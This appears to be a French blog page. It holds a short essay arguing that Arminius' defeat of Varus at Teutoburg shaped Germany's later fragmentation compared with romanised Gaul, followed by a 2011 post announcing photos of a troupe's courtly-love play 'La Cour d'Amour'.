Par contraste l’Allemagne est fragmentée, et vit une histoire encore plus difficile, avec des affrontements incessants entre princes, comtes, villes libres comme Hambourg. La puissance des marchands de la ligue Hanséatique, la coopération et l’unité de ce réseau commercial qui s’étend, bien au dela de l’Allemagne, sur toute l’Europe, ne peut pas faire oublier les ravages des guerres, l’autorité parfois vacillante, souvent contestée de l’Empereur.

Pourtant, à la mort de Charlemagne, l’Empire d’Occident se partage en trois, et on aurait pu imaginer que les trois royaumes évolueraient de la même façon. Mais non, et tout cela s’est joué bien avant Charlemagne, dans une
période qui va de -70 à 20 environ.

Quand Vercingétorix perd sa dernière bataille face à César, à Alésia, il ouvre la voie définitivement à la colonisation romaine en Gaule. Une colonisation qui cherche à intégrer et à romaniser les populations locales,
qui, en plus de ses structures politiques, apporte ses routes, ses aqueducs, une première infrastructure de communications, essentielle pour le commerce et l’échange culturel.

Quand Hermann le Chérusque massacre les légions de Varus, dans la forêt de Teutoburg, malgré quelques années de lutte avec Rome, il vient de donner un coup d’arrêt définitif à l’expansion de l’Empire Romain à l’est. Une fois les
deux aigles volées aux légions décimées récupérées, Rome met fin à ses tentatives de conquêtes et de pacification des pays barbares orientaux, et se retire derrière le Rhin et la fortification du limes.

Limes dont on trouve encore la trace permanente en Allemagne. D’abord en tant que vestige historique, et son tracé est marqué dans de nombreux murs, par des pierres gravées qui indiquent qu’ici s’arrêtait l’empire romain. Et puis surtout par une différence dans le développement culturel, et historique. Au delà du limes, la période entre Hermann et le Moyen Age (environ l’an 800) reste le plus souvent une préhistoire, une antiquité non écrite.

Des villes importantes n’apparaissent qu’en 800, 1.000, ou même plus tard. L’an Mille n’est pas celui d’une crainte de fin du monde, mais celui du début des cités, de la création tardive, à travers les réseaux d’abbayes
et le pouvoir des grands évêchés, de ces réseaux de communication commerciale et intellectuelle qui existait largement avant en Europe de l’Ouest.

Hermann a-t-il rendu service à son peuple ?
A très court terme, sans aucun doute, en lui permettant de continuer à vivre libre. A très long terme, sa victoire n’a plus d’impact, et d’autres ont marqué beaucoup plus l’histoire de la Mittel Europa. A court terme, au Haut Moyen Age, il faisait sans doute meilleur vivre à l’intérieur de l’ancien limes que dans les forêts épaisses qui entourent la Teutobourg.

la Cour d’Amour

mercredi 29 juin 2011

logo-fortunaVous trouverez une série de photos de notre spectacle « La Cour d’amour », une pièce en un acte, inspirée du « Traité de l’amour courtois » d’André le Chapelain et du « Traité de l’amour parfait » de l’anonyme d’Erfurt, en suivant les liens suivants :

la Cour d’Amour

Danse dans un jardin courtois

Journée dans un jardin courtois

Prestation du dimanche 22 mai 2011, à Noisy le Grand, dans un jardin courtois éphémère.

Vous pouvez aussi visiter et participer à notre Jardin Courtois virtuel ou encore nous rejoindre sur notre page Facebook